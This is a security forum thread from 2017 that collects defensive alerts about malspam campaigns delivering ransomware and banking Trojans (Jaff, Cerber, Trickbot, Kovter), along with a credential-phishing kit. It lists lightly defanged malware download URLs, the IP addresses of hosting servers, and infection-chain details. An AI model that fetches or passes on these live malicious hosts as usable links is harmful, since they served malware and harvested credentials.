- https://myonlinesecu...eliver-malware/
16 May 2017 - "... an empty/blank email with the subject of 'Re: invoice 28769' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment that contains another zip that in turn contains a .js file... downloads Cerber ransomware...

Screenshot: https://myonlinesecu...nvoice28769.png

... I am reliably informed[1] that with a couple of minor fixes to correct the malware developers mistakes this downloads Cerber ransomware from
 hxxp ://mdnchdbde .pw/search.php which delivers a file 1 (VirusTotal 6/59*) (Payload Security**)... 'certain that they will fix it in the next malspam run. These criminal gangs often send a small spam run out to “test the waters” and when they don’t get any expected result they double check & fix the errors ready for the next spam run.

262647732.zip: extracts to 27000_packed.zip: which in turn Extracts to: 27000.js
Current Virus total detections 0/57[3]:  Payload Security[4] Joebox[5] - none of the online sandboxes managed to get any download location or malware content from the .js file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://twitter.com/...350538112016385

* https://www.virustot...sis/1494912080/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts (1088)

3] https://www.virustot...sis/1494910036/

4] https://www.hybrid-a...vironmentId=100

5] https://jbxcloud.joe...s/271922/1/html

mdnchdbde .pw: 35.163.27.202: https://www.virustot...02/information/
> https://www.virustot...f809c/analysis/
___

Fake 'pdf attachments' SPAM - delivers Jaff ransomware
- https://myonlinesecu...aff-ransomware/
16 May 2017 - "... series of emails with pdf attachments that drops a malicious macro enabled word doc is an email with the subject of 'Emailing: 2650032.pdf' (random numbers) pretending to come from random names at your-own-email-address that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...2650032_pdf.png

2650032.pdf - Current Virus total detections 8/54*: Payload Security**... drops EYRCUD.docm
(VirusTotal 8/59***) (Payload Security[4])... downloads an encrypted txt file from
  http ://personalizar .net/Nbiyure3  which is converted by the script to galaperidol8.exe ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494926923/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213


*** https://www.virustot...sis/1494927173/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213


personalizar .net: 81.88.57.70: https://www.virustot...70/information/
> https://www.virustot...774c2/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 16 May 2017 - 08:12 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1929 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 17 May 2017 - 06:10 AM

FYI...

Fake 'Secure Message' SPAM - delivers trickbot
- https://myonlinesecu...ivers-trickbot/
17 May 2017 - "An email with the subject of 'You have received a new Bankline Secure Message' pretending to come from Bankline RSA but actually coming from a look-a-like domain Bankline RSA <SecureMessage@ banklinersa .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...ure-message.png

... criminals sending these have registered various domains that look like genuine bank domains. Normally there are 3 or 4 newly registered domains that imitate the bank or some message sending service that can easily be confused with a legitimate organisation in some way that send these. So far we have only found 1 domain today banklinersa .co.uk. As usual they are registered via Godaddy as registrar and for a change  the emails are sent via rackspace hosting not the usual citynetwork AB in Sweden. They are currently using IP numbers 104.130.29.210, 172.99.115.203, 172.99.115.216, 172.99.115.23, 104.239.169.15, 104.130.29.243, 104.130.29.245, 172.99.115.29...

SecureMessage.doc - Current Virus total detections 4/56*. Payload Security** downloads from
  http ://ocysf .org/wp-content/GktpotdC7dyTH1aoroa.png  which of course is -not- an image file but a renamed .exe file that gets -renamed- to a .exe and autorun (VirusTotal 10/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495019899/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
50.87.146.185
107.22.214.64
95.104.2.225
192.157.238.15


*** https://www.virustot...sis/1495019988/

ocysf .org: 50.87.146.185: https://www.virustot...85/information/
> https://www.virustot...d6f8a/analysis/
___

Adobe account - Phish
- https://myonlinesecu...text-data-urls/
17 May 2017 - "... 'thought this was going to be some newer malware delivery method, but it is only -phishing- for email credentials, which of course is also extremely serious and very bad.
NOTE: This phishing scam only works in Google Chrome. Internet Explorer will not open data:text/html urls and gives a 'cannot display' page message. Firefox refuses to display anything - just a white screen with the original url in the address bar...

Screenshot: https://myonlinesecu...shing-email.png

This email has a genuine PDF attachment that contains a blurred out image of an invoice with the prompt to view the Secured PDF Online Document on Adobe:
> https://myonlinesecu...ice1246_pdf.png
-If- you click on the blurred image you get a pop up warning  about links. When you follow the link inside the pdf it sends you to http ://tiny .cc/tis7ky which immediately -redirects- to
 http ://qualifiedplans .com/administrator/components/com_smartformer/plugins/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/phmho/
  where it downloads/opens a data:text url that displays a web page on your computer -not- an external site looking like:
> https://myonlinesecu...5/timed_out.png
After you press OK you get what looks-like an Adobe Business sign in page with what looks-like a download button. I inserted the usual set of fake details & pressed download, expecting some sort of malware to appear, but no it just -bounced- me on to the genuine Adobe page while your stolen data is sent to  http ://setas2016 .com/image/catalog/Katalog/files/pageConfig/PDF3/index/adobe.php
With a bit of digging around We have discovered the compete phish is also hosted on  http ://setas2016 .com/image/catalog/Katalog/files/pageConfig ...
> https://myonlinesecu...obe_sign_in.png
The data:text/html  file is available for download via Payload Security*. It is in the extracted files section named urlref_httptiny .cctis7ky ..."
* https://www.hybrid-a...vironmentId=100

setas2016 .com: 87.118.140.114: https://www.virustot...14/information/
> https://www.virustot...7fab9/analysis/
___

ICS-ALERT-17-135-01A
Indicators Associated With WannaCry Ransomware (Update A)
> https://ics-cert.us-...LERT-17-135-01A
Original release date: May 15, 2017 | Last revised: May 16, 2017
"... updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site..."
(More detail at the URL above.)
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 17 May 2017 - 08:30 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1930 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 18 May 2017 - 05:31 AM

FYI...

Fake 'UPS' SPAM - delivers banking Trojan
- https://myonlinesecu...banking-trojan/
18 May 2017 - "... some are being delivered with the word -doc- attachment, but about half are just getting the email body with an -HTML- attachment which has the same details as the email body and no word doc attachment... the details with an email with the subject of 'Fwd: UPS Worldwide Saver Notification' pretending to come from various random names @ yahoo. es -or- .de -or- .pt -or- from random@ hotmail .es -or- de . We are also seeing a sprinking from other free webmail services like web .de with a malicious word doc attachment with a random number delivers ursnif banking Trojan. I am also seeing other parcel delivery companies like TNT and unnamed delivery services also being imitated and -spoofed- in this campaign. The TNT ones are zips with word docs inside. -All- of them today are using embedded OLE objects rather than macros to deliver Ursnif banking and password stealing Trojans.
Update: Now seeing some coming through with zip attachments containing .js files
Some subjects include:
    TNT Express – Documents – RL54413826 ( random numbers)
    Order Processed
    Export Scan
    Fwd: UPS Worldwide Saver Notification ...

Screenshot: https://myonlinesecu...dwide-saver.png

These word docs contain 2 images of what pretend to be another word doc and an xls file both pretending to be invoices, However they are embedded ole objects and drop 2 different named but identical .js files when clicked on:
> https://myonlinesecu...ole-objects.png
The TNT version has a slightly different email content and word attachment, although still downloading from the -same- urls as other versions:
> https://myonlinesecu...elivery-doc.png
...

doc60 for clearance.doc - Current Virus total detections 0/58*. Payload Security** drops a js file
(VirusTotal 1/22***) (Payload Security[4]) downloads from one of these 2 locations:
  http ://dacera .net/horizont.cv -or- http ://raimco .com/case.sub
and gets converted/renamed to a working .exe file (VirusTotal 9/61[5])

TNT version: RL82670483822.zip extracts to RL02993847001.doc VirusTotal 0/57[6]| Payload Security[7]

Zip/JS version: QPABA0MCY0D2.zip extracts to 1A029837T2990101.pdf.js VirusTotal 3/57[8]|
Payload Security[9] ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495100198/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
2.17.22.36

*** https://www.virustot...sis/1495100566/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
54.149.71.19
77.104.189.47


5] https://www.virustot...8889a/analysis/

6] https://www.virustot...sis/1495101803/

7] https://www.hybrid-a...vironmentId=100

8] https://www.virustot...sis/1495102966/

9] https://www.hybrid-a...vironmentId=100

dacera .net: 54.149.71.19: https://www.virustot...19/information/
> https://www.virustot...49b60/analysis/

raimco .com: 77.104.189.47: https://www.virustot...47/information/
> https://www.virustot...8889a/analysis/

dacera .net/horizont.cv
> https://www.virustot...49b60/analysis/

raimco .com/case.sub
> https://www.virustot...ec432/analysis/
___

Fake 'FedEx' SPAM - delivers -kovter- malware
- https://myonlinesecu...w-using-macros/
18 May 2017 - ""An email with the subject of 'FedEx Parcel #262844740, Delivery Unsuccessful' pretending to come from FedEx Customer Service <tamawuv52640888@ soie. in> (random email addresses) with a malicious word doc attachment delivers multiple malware... 'used to seeing these -fake- FedEx and other parcel delivery services emails, but they usually contain zip files and js files. It is -unusual- to have word macro attachments...

Screenshot: https://myonlinesecu...ex-delivery.png

The instructions and image in the macro laden word doc have also -changed- from previous versions:
> https://myonlinesecu...elivery-doc.png

info_delivery.doc - Current Virus total detections 5/58*. Payload Security** shows a download from
  http ://regereeeeee .com/gate2.php?ff1 which appears to be a massive encrypted txt file (833kb) which appears to drop -kovter- (b215.exe ***) (VirusTotal 14/61[4])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script -or- an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...c2b00/analysis/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts (424)

*** https://www.hybrid-a...c0183af2e4be850
Contacted Hosts (424)

4] https://www.virustot...sis/1495118313/

regereeeeee .com: 13.58.26.56: https://www.virustot...56/information/
> https://www.virustot...5b9d4/analysis/

> https://www.virustot...9c005/analysis/
___

WannaCry Fact Sheet
- https://www.us-cert....aCry-Fact-Sheet
Last revised: May 18, 2017
>> https://ics-cert.us-..._Ransomware.pdf
"... Systems that have installed the MS17-010 patch* are -not- vulnerable to the exploits..."
* https://technet.micr...y/ms17-010.aspx
March 14, 2017
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 19 May 2017 - 05:40 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1931 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 21 May 2017 - 12:19 PM

FYI...

Fake 'blank' SPAM - doc/js attachment delivers ransomware
- https://myonlinesecu...2-0-ransomware/
21 May 2017 - "An empty/blank email with no subject pretending to come from jhavens@ mt .gov with a zip file that contains malicious word doc with an embedded OLE object delivers GlobeImposter 2.0 ransomware...
The email looks like:
From: jhavens@ mt .gov
Date: Sun 21/05/2017 13:34
Subject:  none
Attachment:  625855442530.zip
Body content:
    totally blank/empty


625855442530.zip - extracts to 1.doc - Current Virus total detections 0/56*. Payload Security**
 - drops a js file... (BR16E2~1 .JS) - VirusTotal 2/56[3] | Payload Security[4] downloads from
 http ://oldloverfg .top/admin.php?f=2 which gave yez348746.tae (VirusTotal 12/61[5]) | Payload Security[6]
While encrypting your files the js file drops this html file with instructions how to pay the ransom & retrieve your files. They are charging 1 bitcoin which is currently approx. $2000 USD...
> https://myonlinesecu...ransom-note.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495370663/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.93.208

3] https://www.virustot...sis/1495370901/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.93.208

5] https://www.virustot...sis/1495371343/

6] https://www.hybrid-a...vironmentId=100

oldloverfg .top: 47.91.93.208: https://www.virustot...08/information/
> https://www.virustot...94e46/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 21 May 2017 - 12:27 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1932 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 22 May 2017 - 08:12 AM

FYI...

Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecu...aff-ransomware/
22 May 2017 - "... series of emails with pdf attachments that drops a malicious macro enabled word doc is an email with the subject of 'Invoice 43412591' (random numbers) pretending to come from noreply@ random companies that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...ce-43412591.png

43412591.PDF - Current Virus total detections 13/56*. Payload Security** - drops QDLCPQKK.doc
(VirusTotal 10/58[3]) (Payload Security [4]) downloads an encrypted txt file from
 http ://primary-ls .ru/jhg6fgh  which is converted by the script to buzinat8.exe (VirusTotal 7/58[5])
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
primary-ls .ru\jhg6fgh
brotexxshferrogd .net\af\jhg6fgh
herrossoidffr6644qa .top\af\jhg6fgh
joesrv .com\jhg6fgh
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495454756/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
141.8.195.87
217.29.63.199


3] https://www.virustot...sis/1495455867/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
141.8.195.87
217.29.63.199


5] https://www.virustot...sis/1495455099/

primary-ls .ru: 141.8.195.87: https://www.virustot...87/information/
> https://www.virustot...4d7c3/analysis/
 

:ninja: :ninja:    :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1933 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 24 May 2017 - 07:04 AM

FYI...

Jaff ransomware gets a makeover: fake -invoice- theme
- https://isc.sans.edu...makeover/22446/
2017-05-24 - "Since 2017-05-11, a new ransomware named 'Jaff' has been distributed through malicious spam (malspam) from the 'Necurs botnet':
> https://securityinte...malicious-spam/
This malspam uses PDF -attachments- with 'embedded Word documents' containing -malicious- macros. Victims must open the PDF attachment, -agree- to open the embedded Word document, then -enable- macros on the embedded Word document to -infect- their Windows computers:
> https://isc.sans.edu...ry-image-01.jpg
Prior to -Jaff- we've seen waves of malspam using the same PDF attachment/embedded Word doc scheme to push -Locky- ransomware. Prior to that, this type of malspam was pushing -Dridex-. With all the recent news about -WannaCry- ransomware, people might forget Jaff is an ongoing threat. Worse yet, some people might not know about it at all since its debut about 2 weeks ago. Jaff has already gotten a makeover, so an infected host looks noticeably different now... The emails: This specific wave of malspam used a -fake- invoice theme... I collected -20- emails... these emails -all- have PDF attachments, and each one contains an embedded Word document. The Word document contains malicious-macros designed to -infect- a Windows computer:
> https://isc.sans.edu...ry-image-05.jpg
The embedded Word document with malicious macros:
> https://isc.sans.edu...ry-image-06.jpg
Follow the entire infection chain, and you'll see minimal network traffic compared to other types of malware.  The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host... My infected host asked for 0.35630347 bitcoin as a ransom payment:
> https://isc.sans.edu...ry-image-14.jpg
... Much of this malspam is easy to spot among the daily deluge of spam most organizations receive. However, this PDF attachment/embedded Word doc scheme is likely an attempt to bypass spam filtering... as long as it's profitable for the criminals behind it, we'll continue to see this type of malspam..."
> http://www.malware-t...5/24/index.html
(More detail at the isc URL at the top of this post.)
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 24 May 2017 - 07:08 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1934 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 25 May 2017 - 06:03 AM

FYI...

Fake 'receipt' SPAM - delivers Jaff ransomware
- https://myonlinesecu...ayments-emails/
25 May 2017 - "... emails with pdf attachments that drops a malicious macro enabled word doc is an email with various subjects along the line of 'receipt, payment, payment receipt' etc. (random numbers) pretending to come from donotreply@ random email addresses and companies that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...eceipt-4830.png

P4830.pdf - Current Virus total detections 12/56*. Payload Security** drops ELMIRJX.doc
(VirusTotal 4/23[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://dreamybean .de/TrfHn4 which should be converted by the script to bruhadson8.exe (unfortunately payload security is showing this as a tiny data file, so something is going wrong there and there must be an anti-analysis element to the malware). There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495710733/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.160

3] https://www.virustot...sis/1495710997/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.160

dreamybean .de: 81.169.145.160: https://www.virustot...60/information/
> https://www.virustot...61cf5/analysis/
> https://www.virustot...675f3/analysis/
___

Fake 'Reminder' SPAM - RTF file exploits deliver malware
- https://myonlinesecu...eliver-malware/
25 May 2017 - "... RTF files this time using the CVE-2017-0199* vulnerability that was fixed in April 2017** and again extra added protections by the May 2017 security updates***. If you haven’t got round to applying these essential patches yet, then go & do it NOW...
* https://nvd.nist.gov...l/CVE-2017-0199

** https://portal.msrc....y/CVE-2017-0199

*** https://portal.msrc....da-000d3a32fc99

... email with the subject of '2nd Reminder Final Demand – Notice of Legal Intention' pretending to come from creditcontrol@ bookatable .com with a malicious word doc attachment eventually delivers sharik/smoke loader after a convoluted download system involving .hta files and PowerShell...

Screenshot: https://myonlinesecu...table-email.png

294616_05152017.rtf - Current Virus total detections 28/57[1]. Payload Security[2] downloads an HTA file from
 http :// 185.162.8.231 :64646/logo.doc (VirusTotal 0/57[3]) which in turn uses powershell to download
 http :// 185.162.8.231 :64646/00001.exe (VirusTotal 48/59[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1]  https://www.virustot...sis/1494977406/

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.162.8.231: https://www.virustot...31/information/
> https://www.virustot...8fd1a/analysis/
> https://www.virustot...655f4/analysis/

3] https://www.virustot...sis/1494854940/

4] https://www.virustot...sis/1495445391/

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.141.25.27
193.104.215.58

 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 26 May 2017 - 09:08 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1935 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 27 May 2017 - 06:55 AM

FYI...

Fake 'DHL' SPAM - delivers js malware
- https://myonlinesecu...ers-ransomware/
27 May 2017 - "... an email with the subject of 'DHL Tracking Number for shipment 97 93745 186' (random numbers)   pretending to come from DHL Corporation with a link in email body to download a file...
Update: Thanks to Antelox* we now have an unpacked version of the malware which is being detected as a corebot / zbot variant (VirusTotal 10/59**) ... Microsoft describes this as TrojanProxy: Win32/Malynfits.A***...
* https://twitter.com/...414436264071168
... after lots of different tweets and conversations, found this from Brad (MalwareTraffic) confirming corebot with a nice writeup by him:
> http://www.malware-t...5/26/index.html

** https://www.virustot...sis/1495880747/

*** https://www.microsof...tID=-2147245786

Screenshots(a): https://myonlinesecu...ilsystem_IE.png

(b): https://myonlinesecu...lmailsystem.png

invoice-0063827410370260857-000001870346531780753154078347.pdf.js - Current Virus total detections 5/56[1]
Payload Security[2] shows a download of various files from the same server one being auvrq.exe
(VirusTotal 20/61[3]) (Payload Security[4])... The link in email body (in the working versions) goes to
 http ://dhlmailsystem .com/documentdir/777126146374729609489374827 where you get slightly different behaviour depending on what browser you use to visit. If you use Internet Explorer or Google Chrome, you get a zip file containing a .js file. Using Firefox you get the .js file itself... you first see a page like this (b) with a message saying 'preparing download' with a countdown marker. When it reaches 0 the message becomes a -link- saying “click here to download if not started automatically” and the malware file is delivered... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
1] https://www.virustot...sis/1495836615/

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
89.223.27.247

3] https://www.virustot...sis/1495865017/

4] https://www.hybrid-a...vironmentId=100

dhlmailsystem .com: 89.223.27.247: https://www.virustot...47/information/
> https://www.virustot...72a6e/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 27 May 2017 - 06:57 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1936 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 30 May 2017 - 06:23 AM

FYI...

Fake 'documents' SPAM - xls attachment delivers malware
- https://myonlinesecu...nknown-malware/
30 May 2017 - "An email with the subject of 'documents' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment delivers malware... Some subjects in this malspam campaign include ...
    inv. payment
    documents


Screenshot: https://myonlinesecu...ment-austin.png

61759684.xls - Current Virus total detections 6/56*: Payload Security** wasn’t able to decode or decrypt the macro but a very quick & easy manual examination shows downloads from
 http ://cautiousvirus .com/mbtrf.exe (VirusTotal 7/60[3]) (Payload Security[4])... The macro in the xls document is trivially encoded by using reverse strings... Opening the XLS attachment gives this -fake- invoice:
> https://myonlinesecu...1759684_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496135720/

** https://www.hybrid-a...vironmentId=100

3] https://www.virustot...4f973/analysis/

4] https://www.hybrid-a...vironmentId=100

cautiousvirus .com: 54.91.240.28: https://www.virustot...28/information/
> https://www.virustot...c12c0/analysis/
___

Fake 'Notification' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
30 May 2017 - "An email with the subject of 'Notification of direct debit of fees' pretending to come from HM Land Registry but actually coming from a look-alike domain... with a malicious word doc attachment... -spoof- of a well known company, bank or public authority delivering malware...

Screenshot: https://myonlinesecu...bit-of-fees.png

Opening the word doc (in protected mode where it is safe) gives this which tries to convince you it is genuine:
> https://myonlinesecu...egistry-doc.png

apl053017_045894595.doc - Current Virus total detections 5/56*. Payload Security** shows a download from
  http ://200.7.105.13 /jpon13.exe (VirusTotal 7/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496147244/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
200.7.105.13
184.87.218.172
185.141.25.27


*** https://www.virustot...sis/1496137829/

200.7.105.13: https://www.virustot...13/information/
> https://www.virustot...137cb/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 30 May 2017 - 11:58 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1937 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 31 May 2017 - 06:14 AM

FYI...

Fake 'Flash Update' - malware
- https://myonlinesecu...imate-websites/
31 May 2017 - "... I was reading a page on my local newspaper... 'got a divert and a big red warning:
> https://myonlinesecu.../fake-flash.png
...  the page I was diverted to (a -fake- flash player update page) is
 https ://izaiye-interactive .net/6141452444727/01296f4851adb85de3a1ad2335c429c8/52ebc0f94a7674f6db533556c202e52f.html
... They are using a ssl prefix HTTPS but there is -no- padlock in the url to confirm this. An HTA file is automatically downloaded (or attempted to be) (VirusTotal 6/55*) (Payload Security**) - if allowed to run unfettered this hta file would download and autorun:
 https ://izaiye-interactive .net/6141452444727/1496218715917605/FlashPlayer.jse
(VirusTotal [3]) (Payload Security[4])... similar attack recently documented:
> https://myonlinesecu...-on-legit-site/
9 Apr 2017
...izaiye-interactive .net was registered yesterday on 30 May 2017 using what are obviously -fake- registrants details via PUBLICDOMAINREGISTRY .COM and hosted on 206.221.189.43 reliablesite .net ..."
* https://www.virustot...sis/1496218758/
FlashPlayer.hta

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
206.221.189.43

3] https://www.virustot...sis/1496219889/
FlashPlayer.jse

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
206.221.189.43
192.35.177.195
109.120.179.92
84.42.243.20
215.88.149.224
132.121.74.105
209.17.219.21


izaiye-interactive .net: Could not find an IP address for this domain name. (May have been taken down.)

206.221.189.43: https://www.virustot...43/information/
> https://www.virustot...0607d/analysis/

> https://www.virustot...94594/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 31 May 2017 - 06:52 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1938 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 01 June 2017 - 08:35 AM

FYI...

Fake 'FedEx USPS UPS' SPAM - delivers Kovter and ransomware
- https://myonlinesecu...and-ransomware/
1 Jun 2017 - "... malware via the “cannot deliver your parcel notifications” or “check where your parcel is”  
-spoofing- FedEx, DHL, UPS, USPS etc. have changed the delivery method. The emails are still very similar to the ones we are used to seeing with this sort of subject line:
    USPS issue #06914074: unable to delivery parcel
    Parcel #006514814 shipment problem, please review
    USPS parcel #3150281 delivery problem
    Courier was not able to deliver your parcel (ID006976677, USPS)
    Parcel 05836911 delivery notification, USPS
    Delivery Status Notification

... What has changed is the -attachment- to the emails contains the malware. These now contain an HTML attachment that when opened displays a webpage on your computer that pretends to be a Microsoft Word online website and says you need to download the 'MSOffice365 Webview Plugin update', with a -blurry-image- of scrambled writing in the background with this message prominantly displayed:
 'This document cannot be read in your browser. Download and install latest plugin version':
> https://i2.wp.com/my...bview.png?ssl=1

Email screenshot: https://i2.wp.com/my...ation.png?ssl=1

... 'previously described in THIS post from Mid April 2017* which shows the obfuscated/encoded nature of the files and how to decode/de-obfuscate them... At that time they linked to a remote website using the -fake- MSOffice365 scam. These malware gangs use a mix-and-match of different techniques to try to stay one step ahead of researchers and antivirus companies and gain more victims:
* https://myonlinesecu...vering-malware/
... Infection chain from 31 May 2017:
1. FedEx-Delivery-Details-ID-8AXP4QH0.doc.html attachment (VirusTotal 2/56[1]) (Payload Security[2])
2. Install-MSOffice365-WebView-Plugin-Update-0.165.11a.zip extracts to:
3. Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js (VirusTotal 8/55[3]) (Payload Security[4])
  Counter.js (VirusTotal 5/56[5]) which downloads 2 files pretending to be png (image files that are -renamed- .exe files) 1.exe currently Cerber -Ransomware- (VirusTotal 8/61[6]) (Payload Security[7]) 2.exe currently Kovter
(VirusTotal 12/60[8]) (Payload Security[9]). The 5 sites embeded in the original webview plugin.js are:
leadsfunnel360 .com
khushsingh .com
kskazan .ru
moodachainzgear .com
thegreenbook .ca
... where you get counter.js ... that when decrypted gives these 5 sites:
sharplending .com
moodachainzgear .com
buildthenewcity .biz
valdigresta .com
leadsfunnel360 .com
... Where <sitename)/counter/?1 gives the Cerber ransomware and <sitename)/counter/?2 gives Kovter... the js files try to contact the sites in order they are listed. It then tries each combination of sitename/counter/etc. and if any site fails to respond, then moves to next site in the list and continues to do that until the counter.js & the actual malware files are downloaded-and-run on the victim’s computer... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1496239829/
FedEx-Delivery-Details-ID-8AXP4QH0.doc.html

2] https://www.hybrid-a...vironmentId=100

3] https://www.virustot...sis/1496240000/
Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts (1279)

5] https://www.virustot...sis/1496296754/
COUNTER[1].js

6] https://www.virustot...sis/1496240581/
60[1].png

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts (1089)

8] https://www.virustot...sis/1496240649/
11.exe

9] https://www.hybrid-a...vironmentId=100
Contacted Hosts (413)

leadsfunnel360 .com: 50.63.124.1: https://www.virustot....1/information/
> https://www.virustot...cfb18/analysis/
khushsingh .com: 72.167.131.40: https://www.virustot...40/information/
> https://www.virustot...3101d/analysis/
kskazan .ru: 87.236.19.130: https://www.virustot...30/information/
> https://www.virustot...213ca/analysis/
moodachainzgear .com: 173.201.92.128: https://www.virustot...28/information/
> https://www.virustot...5fc14/analysis/
thegreenbook .ca: 50.62.160.59: https://www.virustot...59/information/
> https://www.virustot...d1d29/analysis/

sharplending .com: 184.168.55.1: https://www.virustot....1/information/
> https://www.virustot...ff398/analysis/
moodachainzgear .com: 173.201.92.128: https://www.virustot...28/information/
> https://www.virustot...5fc14/analysis/
buildthenewcity .biz: 50.62.114.1: https://www.virustot....1/information/
